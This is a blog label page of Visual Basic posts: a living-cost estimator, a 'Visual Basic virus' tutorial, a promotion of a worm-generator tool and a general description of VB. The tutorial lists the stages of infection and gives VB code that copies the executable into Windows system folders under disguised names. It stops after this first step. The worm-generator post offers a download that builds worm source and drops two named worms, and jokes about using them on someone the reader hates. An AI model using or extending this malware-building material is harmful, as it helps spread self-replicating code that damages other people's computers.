Showing posts with label Visual Basic. Show all posts
Showing posts with label Visual Basic. Show all posts

Perkiraan biaya hidup

Di posting kali ini, ane pengen ngasi program untuk memperkirakan biaya hidup perbulannya, dan sisa uang yang dapat ditabung. Software ini terinspirasi saat ane ketrima kerja di luar Jawa, tepatnya di riau. Kebayang kan biaya hidup disana, so pasti bingung, minta saran sana-sini, googling sana-sini, sambil ketik kalkulator, n mikir-mikir, wah, nyampe gak ya dengan gaji segini hidup disana, jauh dari rumah, pacar, dll..
Yap akhirnya buka deh lembar kerja visual basic utak atik n jadilah ne program dalam waktu 42 menit. So, klo banyak kekurangan ya maaf ini sebenarnya buat pribadi bro, tapi ya, sapa tau ada yang butuh. Program ini ane namain Estimasi Biaya Hidup, ya namanya estimasi, perkiraan gitu loh, jadi ya.. se jadi-jadinya.. hehe... sangat bisa berbeda dengan apa yang akan terjadi di lapangan.. so klo mau programnya, silakandownload..

Read More......

Tutorial Visual Basic Virus

Setiap virus memiliki cara kerja yang unik dalam melakukan tugas besarnya sebagai program perusak, atau program jahat. Jika kita tanpa sengaja menjalankan sebuah virus, maka virus tersebut akan mulai masuk ke sistem komputer kita, mengkopi dirinya, merubah registry, bahkan yang lebih parah lagi menginfeksi file-file penting, dokumen, program, maupun gambar lagu dan bla..bla..bla...

Ada beberapa langkah yang dilakukan oleh sebuah virus, secara garis besar langkah tersebut adalah :


1. Infeksi system
2. Penggandaan diri
3. Seting registry
4. Pengaktifan file virus pada system
5. Penyebaran
6. Serangan / perlindungan pada virus tersebut.

Wow...!! canggih juga ya pembuat virus itu?? semua langkah itu dilakukan sesuka hati sang programmer, baik tingkat serangan, metode penyebaran, maupun proses infeksi yang dilakukan, semua dilakukan secara terjadwal dan otomatis.

Bahasa pemrograman yang paling mudah untuk membuat virus / worm adalah visual basic disingkat VB, dimana VB merupakan buatan microsoft, sehingga memiliki banyak fungsi dan tools yang ada didalamnya. oke, langsung saja kita buat sample virus sederhana dari langkah-langkah proses infeksi virus.

1. Infeksi system

Dim lokasi As String
Dim namafile As String

Private Sub Form_Load()

With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With

FileCopy lokasi & namafile, "C:\virus.exe"
FileCopy lokasi & namafile, "C:\Windows\virus.com"
FileCopy lokasi & namafile, "C:\WIndows\virus.pif"
FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr"

End Sub
hoammm.............. ngantuk.............. terusin besok lagi ah....

Yup;;; sampai jumpa pada posting berikutnya....

Read More......

VISUAL BASIC WORM GENERATOR


(VISUAL BASIC WORM GENERATOR)

VBWG is a Tools used to create a virus / worm that is still a source code, so users can change the string as well as analysis of information about computer viruses that use the Visual Basic programming language.

On Worm Generator has two functions that make the virus code and men Drop 2 version Virus Local existing namely W32.Leena and W32.Chasnah.

At this VBWG Loading several options including:
1.First the message appears, select Yes to enterthe program, No to exit.
2.Name Of Program: It is the virus that will make you.
3.Author: It is your name bro ..
4.Then click [create virus]
5.And also the option to drop a virus that has been made, but have the ability with a far different virusworm from VBWG.

Visual Basic Worm Generator Download here
Note:

-Oh yes .. at least you should have VB5 or VB6 program that has been installed in your computer to compile the source code that has been made.

-Do not it make you a virus (be sure to make this code so that the virus does not run than the computer, except the person who you hate.) .. :) ..

-And do not forget to scan your computer with anti-virus after you try your virus, particularly the removable disk.

-Think about this:
Make a virus is fun for some people, but you should not make so great with the virus spread and damage.

Read More......

Visual Basic


Microsoft Visual Basic (often abbreviated as VB only) is a programming language that is event driven and offer Integrated Development Environment (IDE) to create a visual program based application operating system Microsoft Windows programming model by using the Common Object Model (COM). Visual Basic language is derived BASIC offers application development and computer-based graphics with quick access to the database using Data Access Objects (DAO), Remote Data Objects (RDO), or ActiveX Data Object (ADO), and the making of offers ActiveX controls and objects ActiveX. Some script languages such as Visual Basic for Applications (VBA) and Visual Basic Scripting Edition (VBScript), similar as well as Visual Basic, but do they work different.

The programmer can build applications using components provided by Microsoft Visual Basic programs written in Visual Basic can also use the Windows API, but requires additional external function declarations.

In business for programming, Visual Basic has a market that is very knowledgeable. In a survey conducted in 2005, 62% of software developers reported using various forms of Visual Basic, which was followed by C + +, JavaScript, C #, and Java.

Read More......